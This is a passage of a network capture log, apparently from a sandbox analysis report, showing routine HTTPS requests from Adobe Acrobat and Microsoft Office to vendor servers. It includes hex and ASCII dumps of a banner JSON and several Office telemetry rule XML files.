                                                                                                                            Referer: https://rna-resource.acrobat.com/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            2024-11-29 07:30:55 UTC608INHTTP/1.1 200
                                                                                                                            Server: openresty
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:55 GMT
                                                                                                                            Content-Type: application/json;charset=UTF-8
                                                                                                                            Content-Length: 4762
                                                                                                                            Connection: close
                                                                                                                            x-request-id: dFf3Xz08YQgzQYHcEc1NvvWYmOiQzEe7
                                                                                                                            vary: accept-encoding
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                            Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id
                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                            Access-Control-Expose-Headers: x-request-id
                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                            2024-11-29 07:30:55 UTC4762INData Raw: 7b 22 73 75 72 66 61 63 65 73 22 3a 7b 22 44 43 5f 52 65 61 64 65 72 5f 48 6f 6d 65 5f 4c 48 50 5f 54 72 69 61 6c 5f 42 61 6e 6e 65 72 22 3a 7b 22 63 6f 6e 74 61 69 6e 65 72 73 22 3a 5b 7b 22 63 6f 6e 74 61 69 6e 65 72 49 64 22 3a 31 2c 22 63 6f 6e 74 61 69 6e 65 72 4c 61 62 65 6c 22 3a 22 4a 53 4f 4e 20 66 6f 72 20 44 43 5f 52 65 61 64 65 72 5f 48 6f 6d 65 5f 4c 48 50 5f 54 72 69 61 6c 5f 42 61 6e 6e 65 72 22 2c 22 64 61 74 61 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 2c 22 64 61 74 61 22 3a 22 65 79 4a 6a 64 47 45 69 4f 6e 73 69 64 47 56 34 64 43 49 36 49 6c 52 79 65 53 42 42 59 33 4a 76 59 6d 46 30 49 46 42 79 62 79 4a 39 4c 43 4a 31 61 53 49 36 65 79 4a 30 61 58 52 73 5a 56 39 7a 64 48 6c 73 61 57 35 6e 49 6a 70 37 49 6d
                                                                                                                            Data Ascii: {"surfaces":{"DC_Reader_Home_LHP_Trial_Banner":{"containers":[{"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","dataType":"application/json","data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7Im


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            43192.168.2.54975913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:56 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:56 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:56 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 499
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                            x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073056Z-174f7845968j6t2phC1EWRcfe80000000zs000000000674w
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:56 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            44192.168.2.54976613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:56 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:56 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:56 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 420
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                            x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073056Z-174f7845968xr5c2hC1EWRd0hn0000000gkg000000000df7
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:56 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            45192.168.2.54976813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:56 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:56 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:56 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 427
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                            x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073056Z-174f7845968frfdmhC1EWRxxbw0000000zn0000000006qed
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:56 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            46192.168.2.54976713.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:56 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:56 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:56 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 472
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                            x-ms-request-id: feaf0f62-e01e-0071-4f14-4208e7000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073056Z-174f7845968xlwnmhC1EWR0sv80000000zgg000000001zm2
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            47192.168.2.54977096.17.64.1714437720C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:56 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                                                                            Host: armmf.adobe.com
                                                                                                                            Connection: keep-alive
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            If-None-Match: "78-5faa31cce96da"
                                                                                                                            If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                                                                            2024-11-29 07:30:56 UTC198INHTTP/1.1 304 Not Modified
                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                            Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                                                                            ETag: "78-5faa31cce96da"
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:56 GMT
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            48192.168.2.54976913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:56 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:57 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:56 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 486
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                            x-ms-request-id: 56bedb93-201e-0033-7607-41b167000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073056Z-174f7845968qj8jrhC1EWRh41s0000000zh00000000063x3
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:57 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            49192.168.2.54977213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:58 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:58 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:58 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 478
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                            x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073058Z-174f7845968kvnqxhC1EWRmf3g0000000kbg000000007sw6
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:58 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            50192.168.2.54977113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:58 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:59 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:58 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 423
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                            x-ms-request-id: 3eca19a5-d01e-005a-2410-417fd9000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073058Z-174f7845968pght8hC1EWRyvxg00000002r00000000079mk
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:59 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            51192.168.2.54977313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:58 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:59 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:59 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 404
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                            x-ms-request-id: 5685fe29-701e-0098-4071-40395f000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073059Z-174f7845968cdxdrhC1EWRg0en0000000zkg000000004k15
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:59 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            52192.168.2.54977413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:58 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:59 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:59 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                            x-ms-request-id: c473f14b-c01e-00a2-5a07-412327000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073059Z-174f7845968xlwnmhC1EWR0sv80000000zbg000000009nk2
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            53192.168.2.54977513.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
